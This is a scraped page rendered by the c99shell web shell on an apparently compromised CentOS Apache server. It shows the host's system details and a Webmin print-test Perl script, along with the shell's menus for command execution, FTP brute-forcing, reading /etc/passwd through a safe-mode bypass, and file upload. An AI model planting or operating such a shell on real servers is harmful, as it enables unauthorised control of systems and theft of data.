!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/lpadmin/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     test_print.cgi (1.19 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# test_print.cgi
# Print one of the test pages

require './lpadmin-lib.pl';
&foreign_require("proc", "proc-lib.pl");
&ReadParseMime();
$access{'test'} || &error($text{'test_ecannot'});
&ui_print_header(&text('jobs_on', "<tt>$in{'name'}</tt>"),
         $text{'test_title'}, "");

if ($in{'mode'} == 0) {
    $file = "bw.ps";
    }
elsif ($in{'mode'} == 1) {
    $file = "colour.ps";
    }
elsif ($in{'mode'} == 2) {
    $file = "ascii.txt";
    }
else {
    $file = &transname();
    &open_tempfile(FILE, ">$file", 0, 1);
    &print_tempfile(FILE, $in{'file'});
    &close_tempfile(FILE);
    }

$cmd = &print_command($in{'name'}, $file);
if ($access{'user'} eq '*') {
    # Run as root
    }
elsif ($access{'user'}) {
    $cmd = &command_as_user($access{'user'}, 0, $cmd);
    }
else {
    $cmd = &command_as_user($remote_user, 0, $cmd);
    }

print &text('test_exec', "<tt>$cmd</tt>"),"<br>\n";
print "<pre>";
&open_execute_command(CMD, $cmd, 1);
while(<CMD>) {
    print;
    }
close(CMD);
print "</pre>\n";

if ($?) { print "<b>$text{'test_failed'}</b> <p>\n"; }
else { print "$text{'test_ok'} <p>\n"; }

unlink($file) if ($in{'mode'} == 3);
&ui_print_footer("list_jobs.cgi?name=".&urlize($in{'name'}),
          $text{'jobs_return'},
         "", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--